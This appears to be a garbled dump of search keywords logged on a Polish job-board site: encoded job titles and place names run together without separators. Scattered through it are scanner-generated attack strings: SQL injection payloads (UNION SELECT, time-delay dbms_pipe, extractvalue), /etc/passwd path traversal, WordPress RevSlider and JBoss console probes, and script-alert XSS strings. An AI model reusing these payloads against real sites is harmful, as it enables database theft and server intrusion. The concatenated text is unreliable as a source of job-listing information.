badania%252bi%252brozw%2525c3%2525b3jaaaaaaaasap%2babap polandochrona+fizyczna toruńbez+językamonter konstrukcji/wp-login.php'a=0/07545460.php/?author=2pracownik+bufetupracownik+ksi%252525c4%25252599gowo%252525c5%2525259bciasystent+projektanta+sieci warszawamagazynier%252cprodukcja%252ckierowca kat.bkontroler+jako%252525c5%2525259bcipracownik dzia%25c5%2582u w%25c4%2599dlinymonter%25252fka element%2525c3%2525b3w do siedze%2525c5%252584 samochodowych niemcymanager+sprzeda%2525c5%2525bcy+%252528m/k%252529kierowca+bmonta%252525c5%252525bc+instalacji+elektrycznychkierowca++kat+c+union+all+select+concat%2528concat%2528%2527qqzpq%2527%252c%2527heukkkddujlrglrzjhimytphttelydgacdimkffr%2527%25produkcja dla niepe%c5%82nosprawnych%27a%3d0praca fizyczna bez językierowca w wypo%252525252525c5%252525252525bcyczalni samochodowej %25252525252528m%252fk%25252525252529pracownik produkcji %28m%2fk%29kierowca kat c and %28select 3950 from%28select count%28%2a%29%2cconcat%280x71717a7071%2c%28select %28elt%283950%3d3950%2c1%29%wsparcie%2bsprzeda%c5%bcykonsultant ds. obs%25c5%2582ug klienta niemieckoj%25c4%2599zycznegokierowca++kat+c+union+all+select+14,14,14,concat(concat('qqzpq','xoirqgorcl'),'qbbvq'),14,14,14--+klbo2121121121212.1praca bez znajomo%25252525252525c5%252525252525259bci j%25252525252525c4%2525252525252599zykgrodzisk+wielkopolskiglinojeckochrona osób i mienia legnicaadministracja%2bpa%25c5%2584smechanik%2bsamochodowy%2bkierowcaspecjalista+ds.+kadr+i+p%25c5%2582ac+%252kurs na w%c3%b3zek wid%c5%82owypracownik+umys%25c5%2582owy bytompracownik produkcji - praca dla kobiet i m%25c4%2599%25c5%25bcczyznpracownik biurowy śląskiemechanik%2bprzemys%25252525c5%2525252582owy/%2bmonteroperator w%c3%b3zka wid%c5%82owegomanager rejonu sprzeda%2525c5%2525bcywykładanie towaru radlinaluglass - realizacja piotr kalbarczyk") and (select (case when (8476=8476) then null else cast((chr(84)||chr(72)||chr(98)||chr(farmaceutyka+|+biotechnologiawęgrzce wielkiein%2525c5%2525bcynier+elektronik+%252528m/k%252529kluczborkprzemysł+|+produkcja śląskiespecjalista+w+dziale+zaopatrzenia lubuskiemonter konstrukcji/wp-login.php?a=aa85dc../../../etc/passwd wrocławshare a link on twittermalarz+budowlany niemcybudownictwo%252b%257c%252bgeodezja francjamonter+konstrukcji/wp-login.php%252527a%25253d0/wp-admin/wp-admin/admin-ajax.php%25253faction%25253drevslider_show_imageprzemysł | produkcja szamotułyfrench+home+officealuglass - realizacja piotr kalbarczyk%' order by 7591#pracownik+ochrony+fizycznej+z+kwalifikacj%c4%85monter konstrukcji/wp-login.php'a=0/wp-admin/admin-ajax.php?action=revslider_show_image'a=0'a=0 and 1=1</scrsprzataczka w szkole' and 'x'='yhuman+resources+%7c+kadry warszawaz+ykrainyand+1=2+union+select+0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0x6c6f67696e70776e7a,0xtechnik%25252belektryk%25252b%25252528m/k%25252529 polskapracownik+hali warszawairelandsekretarka ze znajomo%25252525c5%252525259bci%25252525c4%2525252585 j. niemieckiegoprzedstawiciel+handlowy lubuskiemonter+rurprzemysł+|+produkcja międzychódmonter konstrukcji/wp-login.php%2527a%253d0/wp-admin/admin-ajax.php%253faction%253drevslider_show_image%2527a%253d0'a=0kierownik regionalny mazowieckiesprzedawca warszawakierowca+w+wypo%25c5%25bcyczalni+samochodowej+%2528m/k%2529obornikitechnik+elektryk/wp-login.php'a=0specjalista%2bds.%2bszkole%25c5%2584kierowca c e polskanauczyciel j%c4%99zyka francuskiegokierowca kat b c1111111111111' union select char(45,120,49,45,81,45)-- warszawaełkelektryk+z+dsbprodukcja+dla++niepełnosprawnych'+union+all+select+13,13,concat(0x7170627871,0x65686e4f4476744f5976,0x717a786a71)#administracja biurowa nasielskkierowca+%28m/k%29+%28kat.+c%2be%2c+hakowce%29 warszawakierowca++kat+c+union+all+select+null%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull--+wkxhpraca++fizyczna+bez+przedstawiciel%2bhandlowy%2bmarki%2bpremiumserwis | technika | montażpraca fizyczna spawaczszczecinoperator+produkcji niepołomicein%2525c5%2525bcynier budowy/wp-login.php%27 and %27x%27%3d%27xmonter%2fka+element%252525c3%252525b3w+do+siedze%252525c5%25252584+samochodowy/etc/passwd%25%27 union all select null%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull-- qhytpraca%252bbez%252bznajomo%25252525252525c5%252525252525259bci%252bj%25252525252525c4%2525252525252599zykapraca+biurowa+z+orzeczeniem warszawaprodukcja dla niepełnosprawnych' union all select 13,concat(0x7170627871,0x456e67524e7569615555545a764673594f65616d59757463776btransport%2b%2525252525257c%2bspedycja%25252525252527a%2525252525253d0%25252525252527a%2525252525253d0kontrola%2bjako%25c5%259bcitechnik%252belektryk%252b%25252528m/k%25252529 pomorskieksięgowa wrocławprzemysł | produkcja kujawsko-pomorskierecepcjonistka krakówpracownik%252525252bszklarni francjakierowca++kat+c+union+all+select+null--+tlhdpraca fizyczna bez j%252525c4%25252599zyasystent/ka ds. administracji i obs%25252525c5%2525252582ugi klienta ze znajomo%25252525c5%252525259bci%25252525c4%2525252585 j%kwalifikowany+pracownik+ochronykierowca kat c%' union all select null,null,null,null,null,null,null-- kcgwspecjalista+ds+kadr+i+płac podkarpackieВодитель+категории+cksi%c4%99gowo%c5%9b%c4%87+%7c+audyt+%7c+podatki pomorskieexecutivemonter konstrukcji/wp-login.php%27a%3d0/07545460.php%27 or %281%2c2%29%3d%28select%2afrom%28select name_const%28char%28111%2c108monter konstrukcji/wp-login.php%2525252527a%252525253d0/07545460.php%2525252527 and %2525252527x%2525252527%252525253d%252525252praca fizyczna budowlany niemcywarehouse/wp-login.php%2527a%253d0%2527a%253d0 and 1%3e1word pressdysponentkierowca kat c union all select null,null,null,null,null,null,null,null-- jspk/etc/passwd%' union all select null,null,null,null,null,null,null-- qhytkierowca++kat+c+union+all+select+null%252cnull%252cconcat%2528concat%2528%2527qqzpq%2527%252c%2527umgimyqgojfmntlpryuvjiuwhcjsxmkierowca w wypo%c5%bcyczalni samochodowej %28m/k%29 katowicekonsultant+j%25c4%2599zyk+angielski mazowieckiekontrola%2525252525252bjako%252525252525252525c5%2525252525252525259bcipracownik produkcji %2528m%2fk%2529%d1%81%d0%ba%d0%be%d1%80%d0%b0%d1%8f %d0%bf%d0%be%d0%bc%d0%be%d1%89%d1%8ckontrola+jakości sosnowiecmonter konstrukcji/wp-login.php?2=2ebc8aoperator+w%2525252525252525c3%2525252525252525b3zk%2525252525252525c3%2525252525252525b3w+wid%2525252525252525c5%252525252525252kontrola%2525252bjako%25252525c5%252525259bcispecjalista%2bds.%2bzakup%25252525c3%25252525b3wkierowca+kontenerysortowacz odpadów komunalnych Łódźpracownik magazynu łódzkiemonter konstrukcji/wp-admin/admin-ajax.php?action=revolution-slider_show_image'a=0konsultant %c5%9blubnyhuman resources %257c kadryinternships project polandsprzataczka biurowa poznańkierowca%25252bb%25252bbes%25252bznajosci%25252bjenzyka niemcyzielonkikierownik+regionówoperator w%252525c3%252525b3zka wid%252525c5%25252582owego %25252528m/k%25252529monter\+pakowacz Świebodzintransport+%7c+spedycja"+and+"x"="xpracownik%252bw%252bgospodarstwie%252brolnym niemcypraca fizyczna sprzątaczka szczecinbudownictwo+%25257c+geodezja+pomocniktransport %25252525257c spedycja%252525252527a%25252525253d0%252525252527a%25252525253d0handlowiec+hurtownia+elektryczna warszawapracownik%252bdzia%2525c5%252582u%252bobs%2525c5%252582ugi%252bklientapakowaczkaspecjalista ds rozlicze%c5%84kierowca+kat.+cekoordynator+ds.+bhppakowacz sułkowicetechnik%20elektryk%20%25252525252528m/k%25252525252529sta%25252525c5%25252525bcysta w dziale rekrutacjikontrola%252525252525252bjako%2525252525252525252525c5%25252525252525252525259bcispecjalista%2bds.%2badministracji%2b%28m/k%29kierowca+mi%c4%99dzynarodowy1+%d0%b7+154+++%2cszuka+pracy+kierowcy+c%2be+pdw%c3%b3jna+obsadamłodszy księgowy krakówasystent in%25252525c5%25252525bcynierapraca%2bfizyczna katowicespecjalista ds księgowościspecjalista d/s importu -eksportu %252c obs%25c5%2582uga klienta %252c ar %252c konsultant z jnauczyciel+j%25c4%2599zyk+niemiecki/login.action/web-console//admin-console/'a=0pracownik biurowy gdyniakonsultant ds. obs%25c5%2582ug klienta niemieckoj%25c4%2599zycznego warszawapracownik%252bpowierzchni%252bsprzeda%2525c5%2525bcy/kasjerilustratoroperator %252525c5%25252582adowarkipracownik+produkcji+(m/k) niemcyopiekunka+do+os%252525c3%252525b3b+starszych+w+niemczech+bez+j%252525c4%25252599zykaspecjalista+bhppracownik+obszaru+produkcji+%2528m/k%2529 czechowice-dziedzicemonter%25252bkonstrukcji%25252fwp-login.php%25252527a%2525253d0%25252f07545460.php%25252band%25252b1%2525253d1%25252527a%2525253produkcja częstochowaks servicenauczyciel+j%c4%99zyk+niemiecki/login.action/web-console/admin-console/login.seam" and (select 9473 from(select count(*),concat(kierowca++kat+c%'+union+all+select+null,null,null,null,null,null,null--+kcgwgearbest+compie+4+anni+e+festeggia+con+una+pioggia+di+sconti+-+notebook+italiaoperator maszyn produkcyjnych niemcypracownik+do+wyk%2525c5%252582adania+towarudo sklepu warszawakontrola%25252bjako%25252525c5%252525259bciprojektant+wn%25c4%2599trzprodukcja+dla++niepełnosprawnych'+union+all+select+null,null,null,null,null,null,null--+zfxzprzemys%25c5%2582+%257c+mistrz+produkcjiopiekunka+os%2525c3%2525b3b+starszychtransport%252b%2525257c%252bspedycjabez znajomo%2525c5%25259bci j%2525c4%252599zyka niemcyspecjalista+ds.+sprzeda%2525c5%2525bcyinżynier+wtryskuvoicepracownik+produkcji+p%252525c5%25252582o%252525c5%25252584skaluglass - realizacja piotr kalbarczyk") and 3791=cast((chr(113)||chr(106)||chr(120)||chr(98)||chr(113))||(select (case when (37warehouse/wp-login.php%27a%3d0%27a%3d0"+and+"x"="xtransport %257c spedycja and 1%3e1tyniec małyprzemys%c5%82 %7c produkcja kujawsko-pomorskieopieka++osob+starszych polskapraca+przy+kwiatachpracownik produkcji - nie wymagamy do%2525c5%25259bwiadczeniasekretarka+ze+znajomo%252525c5%2525259bci%252525c4%25252585+j.+rosyjskiegobadania%2bi%2brozw%2525252525c3%2525252525b3jkierowca+w+wypo%c5%bcyczalni+samochodowejtechnolo+konstrukcji/enterso.info/wp-login.php%252527technik elektryk %2525252528m/k%2525252529 kujawsko-pomorskieprodukcja+dla++niepełnosprawnych'+union+all+select+null,null,null,null,null#ochrona+dla+zwierzątinżynieria | projektowanie Łódźj. niemieckimstare czarnowoprzedstawiciel dolnośląskiekasjer+weekendyz%2bj%2525c4%252599zykiem%2bw%2525c5%252582oskimkierowca+w+wypo%252525252525c5%252525252525bcyczalni+samochodowej+%25252525252528m%252fk%25252525252529 niemcypracownik%2bprodukcji%2b-%2bnie%2bwymagamy%2bdo%2525c5%25259bwiadczeniaserwis+|+technika+|+montaż śląskiemonter konstrukcji//wp-admin/admin-ajax.php%253faction%253drevslider_show_imagekoordynator+biurapracownik administracyjno-biurowy z orzeczeniem o niepełnosprawności jaworznokierowca kat c union all select null%252cnull%252cconcat%2528concat%2528%2527qqzpq%2527%252c%2527umgimyqgojfmntpracownik%2bprodukcji%2b%252528m/k%252529 niemcymechanik%2bsilnik%252525c3%252525b3w%2blotniczychpraca+ogulnobudowlana niemcysprz%252525c4%25252585taczka+w+szkolekielceszklarska porębawarehouse/wp-login.php%2527a%253d0%2527a%253d0%27t%c5%82umacz j%c4%99zyka ukrai%c5%84skiegonauczyciel j%25c4%2599zyk niemiecki/login.action/web-console/admin-console/login.seam/admin-console/monter%252fka+element%25252525c3%25252525b3w+do+siedze%25252525c5%2525252584+samochodowychoffice krakówkierowca+w+wypożyczalni+samochodowej+(m/k)'myślenicekierowca%2bw%2bwypo%25c5%25bcyczalni%2bsamochodowej%2b%2528m/k%2529pracownik szklarni z ogórkami holandiasamoch%2525c3%2525b3d+s%2525c5%252582u%2525c5%2525bcbowypracownik produkcji belsk dużymonta%252525252525c5%252525252525bc instalacji elektrycznychpraca+dla+studentow wrocławoperator%2bw%252525c3%252525b3zka%2bwid%252525c5%25252582owego%2bhamburgkontrola%2bjako%25c3%2585%25c2%259bcimonter konstrukcji/wp-login.php%25252527a%2525253d0/wp-admin/admin-ajax.php%2525253faction%2525253drevslider_sphotoshop warszawakonsultant+ds.+obs%25c5%2582ug+klienta+nplewiskamagazynier %252528m/k%252529 opolekontrola jako%252525c5%2525259bci opolepracownik produkcji %25252528m/k%25252529 niemcypracownik%252bprodukci niemcydoradca%2btechniczny%2b%252525252528komponenty%2bmaszyn%252525252529kierowca w%c3%b3zka wid%c5%82owegopracownik porz%25252525252525c4%2525252525252585dkowypracownik%252bmyjni%252bsamochodowej%252b%252525252528m/k%252525252529monter konstrukcji/wp-login.php%252527a%25253d0/wp-content/uploads/51217766.phpbez+doświadczenia niemcytechnolo konstrukcji/wp-login.php'a=0nauczyciel+j%c4%99zyk+niemiecki/login.action/admin-console/'a=0nauczyciel+j%c4%99zyk+niemiecki/login.action/web-console/admin-console/login.seam") and 9584=concat(char(113)+char(113)+char(106obs%25c5%2582uga klienta warszawatechnolo konstrukcji/enterso.info/wp-login.php%2527niemieckimopieka%27+and+%27x%27%3d%27yrekrutacja pracownik%25c3%25b3win%2525252525c5%2525252525bcynieria%25252b%25252525257c%25252bprojektowanie podkarpackieprzemys%25c5%2582+%257c+produkcja gliwicepracownik szklarni z r%2525252525c3%2525252525b3%2525252525c5%2525252525bcamimaków podhalańskipracownik%2bw%2bgospodarstwie%2brolnym niemcy/etc/passwd' order by 1-- mlcwtraktorzystaspecjalista%2bds.%2bobs%25c5%2582ugi%2bklientatechnik serwis warszawabankowy doradca klienta warszawapracownik%25252bprodukcji francjapracownik dzia%252525c5%25252582u hrkorektor małopolskiejunior++developer/etc/passwd;select+dbms_pipe.receive_message(chr(78)||chr(122)||chr(103)||chr(97),5)+from+dual--pracownik produkcji francjaspecjalista ds. wdro%2525c5%2525bce%2525c5%252584pracownik+szklarni+z+r%25c3%25b3%25c5%25bcami holandiaprodukcja+dla++niepełnosprawnych+union+all+select+null,null,null,nullprodukcja%252bdla%252b%252bniepe%2525c5%252582nosprawnych%252b1/2%252betatustaroźrebyasystent/ka ds. administracji i obs%25c5%2582ugi klienta nasielskpracownik produkcji p%25c5%2582o%25c5%2584skspecjalista ds kadr i płac dolnośląskieprodukcja+dla++niepełnosprawnych+union+all+select+null,null,null,null,null,null--+rhhjizdebnikjęzyk francuskikierowca w wypożyczalni samochodowej (m/k) podlaskieredaktor+treści+psychologicznychmonter konstrukcji/wp-login.php'a=0/07545460.php' or (1,2)=(select*from(select name_const(char(111,108,111,108,111,115,104,101,1praca+pomocproductionmonitoring warszawapracownik szklarni z og%2525252525c3%2525252525b3rkamimarketing+%257c+reklama+%257c+prsport | rekreacjapakowanie sosnowieckierowca w wypo%2525252525c5%2525252525bcyczaoperator wózka widłowegokonsultant telefoniczny ds. sprzeda%252525c5%252525bcy produkt%252525c3%252525b3w bankowychpracownik monta%c5%bcu %28m/k%29 katowicepraca+popołudniami warszawa/etc/passwd+union+all+select+null,null,null--+bsgzmonter+konstrukcji/wp-login.php%252527a%25253d0/07545460.phpspecjalista ds. kadr i płac (m/k) warszawacustomer%2bcarepraca%25252525252bzakwterowaniem polskabudownictwo %2525252525257c geodezja francjapracownik księgowościtransport | spedycja'a=0'a=0analityk hta (kraków)ślusarz świdnikspecjalista ds kadr i p%2525c5%252582ac podkarpackiekontroler jako%2525252525c5%25252525259bcikierowca++kat+c%27+union+all+select+null%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull--+ljqhasystent ds. ksi%252525c4%25252599gowoscisekretarka ze znajomo%2525252525c5%25252525259bci%2525252525c4%252525252585 j. rosyjskiegomonter konstrukcji/wp-login.php'a=0/wp-admin/admin-ajax.php?action=revslider_show_image'a=0'a=0' and 'x'='y" and "x"="xpracownik%2bdzia%25c5%2582u%2bprodukcji%28select 7866 from%28select count%28%2a%29%2cconcat%280x71786a6b71%2c%28select %28elt%287866%3d7866%2c1%29%29%29%2c0x71766b7871rolnictwo %7c ochrona %c5%9brodowiskaaaaaaaaaprzemysł+|+produkcja wałbrzychsprzedażyadministracja pa%c5%84stwow warszawawarehouse/wp-login.phpa=0a=0+order+by+100nauczyciel j%c4%99zyk niemiecki/login.action/web-console/invoker/jmx-console/htmladaptor?action=inspectmbeanpraca bez znajomoÅ›cc%2523redaspecjalista+ds.+p%2525252525c5%252525252582ac+i+kadrprojektant/konstruktor/asystent odzie%25c5%25bcystudio+assistant+jobsrybnikpracownik+monta%252525c5%252525bcupolanicaprogramista+cncoperator wózka widłowego niemcykey account manager %2525252528m/k%2525252529nowa wieś lęborskatransport %252525257c spedycja and 1%3e1warehouse/wp-login.php%27a%3d0%27a%3d0" and "x"="x tychymagazynier+z+uprawieniami+na+wózki+widłowss=sta%c5%bcysta+w+dziale+rekrutacjimonter%25252bkuchnitechnik+informatykprzemysł+|+produkcja sochaczewprodukcja indesit - bezp%25c5%2582atny transport- atrakcyjne premiekontroler jako%c5%9bci %28m/k%29 warszawapraca%2bpomoc%2bksi%2525c4%252599gowejmonter%2525252525252fka%2belement%252525252525252525c3%252525252525252525b3w%2bdo%2bsiedze%252525252525252525c5%2525252525252525sprzeda%25c5%25bc %257c obs%25c5%2582uga klienta radommonter%2bkonstrukcji%25252fwp-login.php%2525252527a%252525253d0%25252f07545460.php%2band%2b1%252525253d1%2525252527a%252525253d0kierowca%252bc%252be niemcysiewierzspec+ds+zakupowspecjalista ds.księgowychpracownik produkcji (m/k) bytommonter%252525252fka+element%25252525252525c3%25252525252525b3w+do+siedze%25252525252525c5%2525252525252584+samochodowy niemcyprodukcja dla niepełnosprawnych' union all select null,null,null,null,null,null,null-- zfxzstep up niemcypomoc%2bkuchenna%2c%2basystentki%2c%2bcukirnikskrzypce na %c5%9blubchodzieżumowa o pracęmagazynier - nie wymagamy doświadczenia wrocławtrenkwalder wrocławkierowca++kat+c+union+all+select+null%2cnull%2cnull%2cnull%2cnull%2cconcat%28concat%28%27qqzpq%27%2c%27gvxyhvwzyp%27%29%2c%27qbb/etc/passwd;select dbms_pipe.receive_message(chr(78)||chr(122)||chr(103)||chr(97),5) from dukostrzyn+nad+odrąj%25c4%2599zyk+francuskikierowca+w+wypo%25252525252525c5%25252525252525bcyczalni+samochodowej+%2525252525252528m%252525252fk%2525252525252529praca bez znajomo%2525252525252525c5%25252525252525259bci j%2525252525252525c4%252525252525252599zyk niemcy%25c5%259blusarz spawaczredaktor treści psychologicznych poznańtransport %7c spedycja mazowieckiepracownik powierzchni sprzedaży/kasjer jaworkierowca kat c%' order by 6066-- mnacmagazynier %252525252528m/k%252525252529administracja+państwowmistrz produkcji poznańkierowca w wypo%252525252525c5%252525252525bcyczalni samochodowej %25252525252528m%252fk%25252525252529 niemcyin%25252525c5%25252525bcynieria%25252b%252525257c%25252bprojektowanie podkarpackiemechanik+przemys%25c5%2582owy/+monter niemcysortowacz odpad%2525c3%2525b3w komunalnychpiotrków trybunalskikierownik sklepumonter+p%2525c5%252582ytpracownik+porz%2525252525c4%252525252585dkowy+%252525252528m/k%252525252529junior+front-end warszawaspecjalista+ds+ubezpiecze%25c5%2584 warszawaasystent/ka ds. ksi%25c4%2599gowoscispecjalista ostrów wielkopolskipo%25252525c5%2525252582%25252525c4%2525252585czenia+przychodz%25252525c4%2525252585cepraca%2525252bbez%2525252bznajomo%252525252525c5%2525252525259bci%2525252bj%252525252525c4%25252525252599zykatransport+|+spedycja'a=0 tychyspecjalista+ds+kar+i+p%252525c5%25252582ac%25252527a%2525253d0pracownik%2bpowierzchni%2bsprzeda%25252525c5%25252525bc%25252525c4%2525252585praca+bez+znajomo%25c5%259bci+j%25c4%259technik+elektryk+(m/k) wrocławprodukcja+dla++niepe%2525c5%252582nosprawnych%252527a%25253d0specjalsita ds. zakupówkontrolakorwek marcin f. h.u. eko-tech solki rajgr%2525c3%2525b3d barg%2525c5%252582%2525c3%2525b3w ko%2525c5%25259bcielny.monter+pod%252525c5%25252582%252525c3%252525b3gkierowca w wypożyczalni samochoperator palnikapracownik%252bumys%25c5%2582owymonter konstrukcji/wp-login.php%252527a%25253d0/wp-admin/wp-admin/admin-ajax.php%25253faction%25253drevslider show image" or (1,dobraoperator%2525252bw%25252525c3%25252525b3zk%25252525c3%25252525b3w%2525252bwid%25252525c5%2525252582owych polskabudownictwo%2525252b%2525252525252525257c%2525252bgeodezjaoperator%25252bw%2525252525c3%2525252525b3zk%2525252525c3%2525252525b3w%25252bwid%2525252525c5%252525252582owychwolinasystent/ka ds. ksi%25c4%2599gowosci pomorskiekierowca kat c%25%27%3bselect dbms_pipe.receive_message%28chr%28103%29%7c%7cchr%2880%29%7c%7cchr%2890ambasador+markimarkisupport+ittransport+%7c+spedycjaoperator cnc frezer tokarzpracownik administracyjny Łódźkierowca %2528m/k%2529 %2528kat. c e%252c hakowce%2529 niemcybadania%2bi%2brozw%2525c3%2525b3jaaaaaaaaoperator koparki śląskiejako%25c5%259b%25c4%2587asystent in%c5%bcynierap%c3%b3%c5%82 etatu warszawanauczyciel język niemiecki/login.action/jmx-console/web-console/invokermagazynier/ka%e2%80%93 stawka 18%2c50 z%c5%82/brutto premia%21zgorzelecoperator%2bcnc%2bfrezersekretarka ze znajomo%25252525c5%252525259bci%25252525c4%2525252585 j. francuskiegospecjalista%252bds.%252badministracji%252b%252528m/k%252529manager+sprzeda%25c5%25bcy+%2528m/k%2529doradca+ds+nieruchomościkey%2baccount%2bmanager%2b%25252528m/k%25252529operator%25252bw%252525c3%252525b3zkaelektryk+%25252528m/k%25252529 pomorskiekonsultant erpkatowicemonter -spawaczpracownik%2bdo%2bsortowania%2bowoc%25252525252525c3%25252525252525b3wdoradztwo+%7c+konsulting warszawapraca bi poznańpomoc+kuchenna szczecinpracownik+monta%2525252525c5%2525252525bcu+%252525252528m/k%252525252529specjalista ds. planowania jakości (m/k)praca%2bfabrykapraca+bez+znajomo%2525252525c5%25252525259bci+j%2525252525c4%252525252599zykpracownik porz%25252525c4%2525252585dkowy %2525252528m/k%2525252529pomoc ksiegowej poznańkierowca++kat+c';select+dbms_pipe.receive_message(chr(103)||chr(80)||chr(90)||chr(76),5)+from+dual--sprzeda%2525c5%2525bc+%25257c+obs%2525c5%252582uga+klienta lublinwarehouse/wp-login.php%27a%3d0radomsławkównauczyciel język niemiecki/login.action/admin-console/'a=0warehouse/wp-login.php%2527a%253d0%2527a%253d0location%253dtychy%2522 and %2522x%2522%253d%2522xpracownik produkcji kołonowaopiekunka do os%c3%b3b starszych w niemczech bez j%c4%99zykapraca%252bzakwaterowaniemspecjalista%2bds%2bkar%2bi%2bp%c5%82ac%27a%3d0%27a%3d0%27t%c5%82umacz+rosyjskiegospecjalista%2bds.%2bcz%2525c4%252599%2525c5%25259bci%2bzamiennychserwis+%7c+technika+%7c+monta%c5%bc warszawa%25252525252525c5%252525252525259blusarz bez jezykamonter%2525252fka+element%25252525c3%25252525b3w+do+siedze%25252525c5%2525252584+samochodowychspecjalista+ds.+administracyjnychnauczyciel+j%2525c4%252599zyk+niemiecki/login.action/web-console/invoker/invoker/jmxinvokerservletpracownik działu wędliny/serypracownik%252bdzia%2525c5%252582u%252bhrlakiernik samochodowypracownik dzia%252525c5%25252582u w%252525c4%25252599dlinymonter+konstrukcji/wp-login.php%2525252527a%252525253d0/07545460.php+or+%25252525281%252525252c2%2525252529%252525253d%252525252j%25252525c4%2525252599zyk francuskilogistyka+%25257c+dystrybucjakadry i p%c5%82acekonsultant ds. wdro%252525c5%252525bce%252525c5%25252584pracownik%2bprodukcji%2b%2528m%2fk%2529pracownik utrzymania czystości police, szczecin, pilchowo, przęsocin, zachodniopomorskieautomatyk+utrzymania+ruchu małopolskietransport+%7c+spedycja szczecinpraca%2bbez%2bznajomo%2525252525252525c5%25252525252525259bci%2bj%2525252525252525c4%252525252525252599zyka niemcypraca fizyczna bez j%25252525c4%2525252spedytor mi%c4%99dzynarodowyprzemysł+|+produkcja mazowieckiemonter/ka elementów do siedzeń samochodowych niemcyaluglass - realizacja piotr kalbarczyk" rlike (select (case when (2846=2846) then 0x616c75676c617373202d207265616c697a61636a6120kierowca+%2528m%2fk%2529+%2528kat.+c%252be%252c+hakowce%2529помощник wrocławkierowca%252bc%2525252be niemcyedukacja | nauka | szkolenia warszawaarchitekturamechanicy pojazd%c3%b3w ci%c4%99%c5%bcarowychmonter konstrukcji/wp-login.php%3cimgonmouseover%3d%22alert%28%27mysqlerror%27%29%22%3e%27a%3d0praca%252bbez%252bznajomo%2525252525252525c5%25252525252525259bci%252bj%2525252525252525c4%252525252525252599zyka niemcypracownik gospodarczy złota rączka Łódźin%c5%bcynieria+%7c+projektowanie warszawanauczyciel wychowania przedszkolnegokierowca kat c union all select null,concat(concat('qqzpq','fozgdoitzosfomiygouwpolfoaofitpvxcgizprq'),'qbbvq'),null,null,null,pakowacz+bez+j%252525c4%25252599zykapomocnik instalatora instalacji sanitarnych warszawaprzemys%25c5%2582 %257c produkcja warszawaoperator wózka widłowego'a=0praca ochrona warszawakierowca kat c%25%27 union all select null%2cnull-- bkjzkierowca%25252bkat.%25252bcebudownictwo+%257c+geodezja warszawasta%25c5%25bc marketingkadry poznańspecjalista%2bd/s%2bimportu%2b-eksportu%2b%25252c%2bobs%2525c5%252582uga%2bklienta%2b%25252c%2bar%2b%25252c%2bkonsultant%2bz%2bjustrońspecjalista ds. zakup%25252525c3%25252525b3wmonter konstrukcji/wp-login.php%27a%3d0/07545460.php and 1%3e1'and/**/extractvalue(1,concat(char(126),md5(1299929131)))and'praca+z+orzeczeniem+o+niepełnosprawności warszawakontroler jakości (m/k) warszawarozne stanowiskagermanymagazynier (m/k) warszawaelektronik+%2525252528m/k%2525252529+w+zespole+reklamacjioperator w%c3%b3zka wid%c5%82owego skierniewiceolsztyn'monter/ka%252belement%252525c3%252525b3w%252bdo%252bsiedze%252525c5%25252584%252bsamochodowych/etc/passwd union all select null-- sgpgtransport+%257c+spedycja%27+and+%27x%27%3d%27xjunior+front+end+developer warszawasprzeda%25c5%25bc %257c obs%25c5%2582uga klienta rybniklubskomonter konstrukcji/wp-login.php%22%3ehead%3cscript%3ealert%28%27mysqlerror%27%29%3c/script%3ehead%22%3e'/**/and/**/dbms_pipe.recspecjalista ds. obs%2525c5%252582ugi klienta-j. niemieckitransport %7c spedycja szczecinkierowca++kat+c+union+all+select+14,14,14,14,14,concat(concat('qqzpq','jqfsnwtyee'),'qbbvq'),14--+ljauz%2bj%252525c4%25252599zykiem%2bw%252525c5%25252582oskimwarehouse/wp-login.php%2527a%253d0%2527a%253d0location%253dtychy99999%2522+union+select+unhex%2528hex%2528version%2528%2529%2529produkcja dla niepełnosprawnych' union all select concat(0x7170627871,0x6e534e79686f496f4b48,0x717a786a71),13,13in%25c5%25bcynier serwisu warszawapraca dla emerytainżynieria | projektowanie gorzów wielkopolskibiuro warszawaspecjalista ds kar i p%c5%82ac%27a%3d0%27a%3d0%27pracownik produkcyjny %252528m/k%252529asystent ds komunikacji jezyk hiszpanski poznańmistrzkierowca w wypo%2525252525c5%2525252525bcyczalni samochodowej %252525252528m%2fk%252525252529 niemcyadministracja+pa%25c5%2584s warszawaoperator%252bw%252525c3%252525b3zkasolderpraca%2bfizyczna%2bdorywcza%2bwieczoreminformatyka programowanie warszawakonstruktorin%c5%bcynier+procesu+spawaniapracownik+produkcji gdyniakierowca kat c union all select null%252cnull%252cnull%252cnull%252cnull%252cnull-- sgqzpraca z orzeczeniem o niepe%25c5%2582nosprawno%25c5%259bci kierowca kat.bkierowca w wypo%25c5%25bcyczalni samochosprzeda%c5%bc %7c obs%c5%82uga klienta legnicaŚmigielin%2525c5%2525bcynier+budownictwaopieka%22 and %22x%22%3d%22ydyrektor produkcjispecjalista%25252bdtłumacz rosyjskiego i angielskiegosqlmagazynier/ka– stawka 18,50 zł/brutto premia!budownictwo %25252525252525257c geodezja francjaspecjalista ds. kadr i p%25c5%2582ac %2528m/k%2529nowy tomyślkupiec %252528m/k%252529c%252523'a=0inżynier sprzedażypracownik+produkcji dzierżoniówj%252525c4%25252599zyk francuskipraca%2bpomoc%2bksi%2525252525c4%252525252599gowejpraca z orzeczeniem o niepe%25c5%2582nosprawno%25c5%259bcikierowca kat c union all select concat%252528concat%252528%252527qqzpq%252527%25252c%252527hkuhzirnbhswmykcjwbxedektgminnipexvspracownik produkcimonter%2525252fka element%2525252525c3%2525252525b3w do siedze%2525252525c5%252525252584 samochodowych niemcywarehouse+worker/wp-login.php'a=0kierowca kat c union all select null%2cnull%2cnull%2cnull-- wkbnpraca fizyczna spawacz bielsko-bialakierowca+w+wypo%252525252525c5%252525252525bcyczalni+samochodowej+%25252525252528m/k%25252525252529warehouse/wp-login.php'a=0'a=0location=tychy" and "x"="monter%252fka element%2525c3%2525b3w do siedze%2525c5%252584 samochodowychwarehouse/wp-login.php%2527a%253d0%2527a%253d0location%253dtychy%2522+and+%2522x%2522%253d%2522yoperator wtryskarkikierowca kat b c1111111111111' union select char(45,120,49,45,81,45),char(45,120,50,45,81,45),char(45,120,51,45,81,45)-- warszawapracownik powierzchni sprzeda%2525252525c5%2525252525bcy/kasjerwarehouse/wp-login.php%252527a%25253d0%252527a%25253d0location%25253dtychy%252522+and+%252522x%252522%25253d%252522x'a=0specjalista w zespole ds. administracji projektów inwestycyjnych płockmechanik 